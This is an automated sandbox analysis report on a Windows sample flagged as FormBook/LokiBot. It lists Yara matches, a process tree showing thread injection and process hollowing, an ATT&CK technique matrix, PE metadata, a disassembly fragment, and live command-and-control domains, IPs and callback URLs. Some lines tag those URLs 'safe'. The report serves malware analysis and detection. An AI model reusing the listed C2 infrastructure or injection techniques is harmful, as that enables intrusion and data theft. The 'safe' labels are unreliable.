Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Code function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Code function: 0_2_00C7F654 cpuid
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Code function: 0_2_00C7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
Source: C:\Users\user\Desktop\primosdv3.1.1.0.exe | Code function: 0_2_00C6B146 GetVersionExW,

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the count the report shows beside that technique)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter (2); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (512); DLL Side-Loading (11); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Rootkit (1); Virtualization/Sandbox Evasion (1); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (4); DLL Side-Loading (11)
Credential Access: Credential API Hooking (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (241); Virtualization/Sandbox Evasion (1); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (124)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Credential API Hooking (1); Input Capture (1); Archive Collected Data (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
Behavior Graph (ID 715075; sample primosdv3.1.1.0.exe; start date 03/10/2022; architecture WINDOWS; score 100), given here as the process tree the graph encodes:

Graph-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 4 other signatures

primosdv3.1.1.0.exe (started)
    dropped: C:\Users\user\AppData\Local\...\bstkiooen.exe, PE32
    bstkiooen.exe (started)
        dropped: C:\Users\user\AppData\Local\Temp\F61A.tmp, PE32
        signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Found hidden mapped module (file has been removed from disk); Tries to detect virtualization through RDTSC time measurements
        bstkiooen.exe (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            svchost.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe (started)
                    conhost.exe (started)
            explorer.exe (injected)
                network: www.sandstormcase.us 103.224.212.221, 49708, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia
                network: www.nordenergogrup.store 5.101.152.161, 49707, 80 BEGET-ASRU Russian Federation
                signatures: System process connects to network (likely due to code injection or exploit)

Source | Detection | Scanner | Label
primosdv3.1.1.0.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\F61A.tmp | 100% | Avira | TR/Crypt.ZPACK.Gen
C:\Users\user\AppData\Local\Temp\F61A.tmp | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\bstkiooen.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\bstkiooen.exe | 24% | ReversingLabs | Win32.Trojan.LokiBot
Source | Detection | Scanner | Label
1.2.bstkiooen.exe.1010000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
13.2.svchost.exe.3a2f840.4.unpack | 100% | Avira | TR/ATRAPS.Gen5
2.2.bstkiooen.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.0.bstkiooen.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.0.bstkiooen.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
13.2.svchost.exe.60d900.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
No Antivirus matches
Source | Detection | Scanner | Label
http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m | 0% | Avira URL Cloud | safe
www.nordenergogrup.store/sk29/ | 0% | Avira URL Cloud | safe
http://www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD | 0% | Avira URL Cloud | safe
http://www.nordenergogrup.store/sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.sandstormcase.us | 103.224.212.221 | true | true | | unknown
www.nordenergogrup.store | 5.101.152.161 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
www.nordenergogrup.store/sk29/ | true | Avira URL Cloud: safe | low
http://www.nordenergogrup.store/sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD | true | Avira URL Cloud: safe | unknown
http://www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m | svchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
103.224.212.221 | www.sandstormcase.us | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
5.101.152.161 | www.nordenergogrup.store | Russian Federation | 198610 | BEGET-ASRU | true
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:715075
                  Start date and time:2022-10-03 15:57:46 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 15s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:primosdv3.1.1.0.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@10/4@2/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 84.8% (good quality ratio 80.4%)
                  • Quality average: 75.3%
                  • Quality standard deviation: 29%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Users\user\AppData\Local\Temp\bstkiooen.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):189440
                  Entropy (8bit):7.323091547368136
                  Encrypted:false
                  SSDEEP:3072:iAWRgxkQBqhbtf3fHdM4/WOaK17VhuuJuIhxlmbelWufH5Z4:HCff9M4+OaK17zTdlmi9H5Z4
                  MD5:76EA697ED6A45562B791C6DE86E32587
                  SHA1:86386F7A910A1589E2BB13E40E406DA7D0E8EB04
                  SHA-256:336D76467E148CAF61A2F4755B72A2197A61DE80576A315DA678F45EF381C635
                  SHA-512:4F280A3F595D8B73CDC2BA6B877E2F86296CC57FE4047C322E0E555540FB644CC57DCE69E7204A3199873035603A63D41579FB007D3DDA688B7257E90D8EBC80
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: JPCERT/CC Incident Response Group
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$............f..f..f......f......f......f.Rich.f.................PE..L....X.?..........................................@.......................................@..........................................................................................................................................................text...4........................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):3.633221484430513
                  Encrypted:false
                  SSDEEP:48:qvVeshJ8x6Q8jNHdhIsnpPnPihJQSsnpVGJZvq0xpXtJZuNOBSvivc7odlM7BXWM:+j84jhdhIKeKU1xtPunqkcK7B2yh
                  MD5:A2AF309781DF2F75DC0B57AE63B0F3A9
                  SHA1:F4137068334E1856471F4701C96AFAA0470C7D4C
                  SHA-256:328F2A0D53ED5C36513F278F32A0D6166A2DC0993ED4F52185198D6200595E1C
                  SHA-512:5F7BD4C508E1F9F0B391EBC6B42F6F734B846A76D6903DB3E75B7B671D02BEF2BAECB40BCBB37A41394AECCB8D2591C2F5492AA74E458FF814B184D9668F259B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 24%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........xh....D...D...D.r.E...D...D...D{b.E...D{b.D...D{b.E...DRich...D................PE..L.....:c...............!..................... ....@..........................`............@..................................!.......@..0....................P..`.... ............................................... ...............................text...G........................... ..`.rdata..>.... ......................@..@.data...:....0......................@....rsrc...0....@......................@..@.reloc..`....P......................@..B........................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):189440
                  Entropy (8bit):7.991176325141183
                  Encrypted:true
                  SSDEEP:3072:qMpf+ZMhpLYinMDJAaSh5xdYLLTyk6aOaRuFZq5W48u+lcOvK4OUK3aO85/V2CRT:RRcMHLHn4JAxdY3mOvCu+lcft33aO6/F
                  MD5:B02C99ECFDB7D8793254BC8E9C003869
                  SHA1:E38CA7FF9C88E36D19AA0198820B97F6A11DE201
                  SHA-256:2F8EB57267950A4BC6E8DD8B2D7DEF8AFC40B8DB3C5EF49ADC68FB144F7E8E41
                  SHA-512:D12CD9FBABDCC1A5C601D6C0326B34F65FFC63BE84CA94BC6DC70F0E70EC7C3B46122136D6F2A7E82BCB3E27D4BB89D9332DDD35026873FD4029D3405F73B09B
                  Malicious:false
                  Reputation:low
                  Preview:....+J...j....|(.0.u..J..R....).5........jz._3.UE.-Y............|....r.7. ..FF{.......Q.?I~\.i=..b-,.G.=..q...dQc.0/.._..W...v}.b....'`.4t.. x...y......h.m'@.{..C`........E....H.%u.a`...2.......[...V.....q..<........N..5..r....l.2....L...s...Dg+J....3. ...RF0}R.....%=...).0....z...jz._3..E.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-...........H.%..<`p..2.4h<....[....V.BAE'q..Q........Cy.5..r..,.l......L...s>..Dg+J....3. ...U>0}q.....%M...).5........jz._3.UE.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-.......E....H.%.Ba`p..2.).<....[....V.BAE'q..Q........Cy.5..r..,.l......L...s>..Dg+J....3. ...U>0}q.....%M...).5........jz._3.UE.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-.......E....H.%.Ba`p..2.).<....[....V.BAE'q..Q........
                  Process:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4666
                  Entropy (8bit):7.949680139202999
                  Encrypted:false
                  SSDEEP:96:EH5p6GkNpLZr6WP1zzXHvtORRyr5lau1y0OBifC8Ll0q6Nrj:EyZPhPV7HGyTf1ypUVSj
                  MD5:73D355A9E88D7A82F69E612949EB4965
                  SHA1:B6041F58669A65E43FBE8DCBA0DBD061E48812BC
                  SHA-256:115814A83166723CE7080D92AF30822DBD7DC2D5D26EDEC9145B056B7226E166
                  SHA-512:5498AD05A858051705E6E37A884F8897623BB2A415515C951E76D1EF12554994A6DE0CD17B045DD740D9D92055BA1B6A725129F36740261D9DE9EE9BB29577AF
                  Malicious:false
                  Reputation:low
                  Preview:.S.M...#>.t.vY.._.Tn.6T.x=g.7..^...@E....D...vF!..il.(.,.U.P....uZ..zj.e4.H......|.....B,...F....P......%..r"`..........^9.h.1..O..}.D.._.....{,.#.;G[..."aZ5..M.p.<..E.......>..7|...%.....s.U.L.=.5........{...c`.Yp..p.^U...x....?..^.R..>.........,...%1w.|8...3...#.....@..:...Z"..M;.24...:...v...J...../....VM.E..@G...@...(E5.(..6`.C|.8=.*g......N.Y..l.....yp...d..Mu.$83...;.-$B....u...nF....s..R.j.>\.54.O..C.e...$...x..32.~.@.Kh....X;.iC...#.M..J....M....n1.....?..^..`..M.dZ.!.;..l..Y.L.aWu.tX..#.....tEr.k.hA....5....wm ...]".e...]....).....=......C..6.r....5."..1.A.B....h\.I#h....N*...aJQ#.).wh...~.3s0O...o.W...\....2....E../.Z.e,.Q......&r.!eW...B..X...Tqgu......M.Fy.%##.-OT...iM.l..y..._4..%f.8.a......G14N..=.,;.I.w.......x.m.^J.*..[C...D`.[...0.]l[:.......".1aS...{~f.a..cqW..&..liY...qSF0 ..o.T.......b.......F../E..e.).&.ffA.0.ZPP. M..hr.oG..;3^.[.]r...J.....7o.....=.......n....q].....a.vy...a.1K.[.5y..d;...K:...[n..
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.134737003085009
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:primosdv3.1.1.0.exe
                  File size:577991
                  MD5:633bb3ab12d6fd7b6956aa3a93f55e9c
                  SHA1:f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
                  SHA256:0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
                  SHA512:ebdfa42be8d8f1a64900ba48748c8f86d9b74defbf85b3dda94d1df4d7c695d81769e165252fc0cfb2b5ffe347d84eb2f4f74e8d3e3d3ed3fa6466426f4eec28
                  SSDEEP:12288:zToPWBv/cpGrU3yJYqi+4mMz4pbIQ4+N54CHLottc:zTbBv5rUGdf4m/pMQ4m5nrJ
                  TLSH:01C4DF037ACF81B1D2B1283A793592135939BE100FA089CBA7A4579DF9706D3D635FB2
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                  Icon Hash:64e8acaca2d45869
                  Entrypoint:0x41f530
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                  Instruction
                  call 00007FD184D0064Bh
                  jmp 00007FD184CFFF5Dh
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  push esi
                  push dword ptr [ebp+08h]
                  mov esi, ecx
                  call 00007FD184CF2DA7h
                  mov dword ptr [esi], 004356D0h
                  mov eax, esi
                  pop esi
                  pop ebp
                  retn 0004h
                  and dword ptr [ecx+04h], 00000000h
                  mov eax, ecx
                  and dword ptr [ecx+08h], 00000000h
                  mov dword ptr [ecx+04h], 004356D8h
                  mov dword ptr [ecx], 004356D0h
                  ret
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  push esi
                  mov esi, ecx
                  lea eax, dword ptr [esi+04h]
                  mov dword ptr [esi], 004356B8h
                  push eax
                  call 00007FD184D033EFh
                  test byte ptr [ebp+08h], 00000001h
                  pop ecx
                  je 00007FD184D000ECh
                  push 0000000Ch
                  push esi
                  call 00007FD184CFF6A9h
                  pop ecx
                  pop ecx
                  mov eax, esi
                  pop esi
                  pop ebp
                  retn 0004h
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FD184CF2D22h
                  push 0043BEF0h
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FD184D02EA9h
                  int3
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FD184D00068h
                  push 0043C0F4h
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FD184D02E8Ch
                  int3
                  jmp 00007FD184D04927h
                  int3
                  int3
                  int3
                  int3
                  push 00422900h
                  push dword ptr fs:[00000000h]
                  Programming Language:
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x1f293 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x84000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0x1f293 | 0x1f400 | False | 0.424109375 | data | 5.5156403191348256 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x84000 | 0x233c | 0x2400 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
PNG | 0x645e4 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
PNG | 0x6512c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
RT_ICON | 0x666d8 | 0x6556 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x6cc30 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States
RT_ICON | 0x7d458 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x7fa00 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x80aa8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x80f10 | 0x286 | data | English | United States
RT_DIALOG | 0x81198 | 0x13a | data | English | United States
RT_DIALOG | 0x812d4 | 0xec | data | English | United States
RT_DIALOG | 0x813c0 | 0x12e | data | English | United States
RT_DIALOG | 0x814f0 | 0x338 | data | English | United States
RT_DIALOG | 0x81828 | 0x252 | data | English | United States
RT_STRING | 0x81a7c | 0x1e2 | data | English | United States
RT_STRING | 0x81c60 | 0x1cc | data | English | United States
RT_STRING | 0x81e2c | 0x1b8 | data | English | United States
RT_STRING | 0x81fe4 | 0x146 | data | English | United States
RT_STRING | 0x8212c | 0x46c | data | English | United States
RT_STRING | 0x82598 | 0x166 | data | English | United States
RT_STRING | 0x82700 | 0x152 | data | English | United States
RT_STRING | 0x82854 | 0x10a | data | English | United States
RT_STRING | 0x82960 | 0xbc | data | English | United States
RT_STRING | 0x82a1c | 0xd6 | data | English | United States
RT_GROUP_ICON | 0x82af4 | 0x4c | data | English | United States
RT_MANIFEST | 0x82b40 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
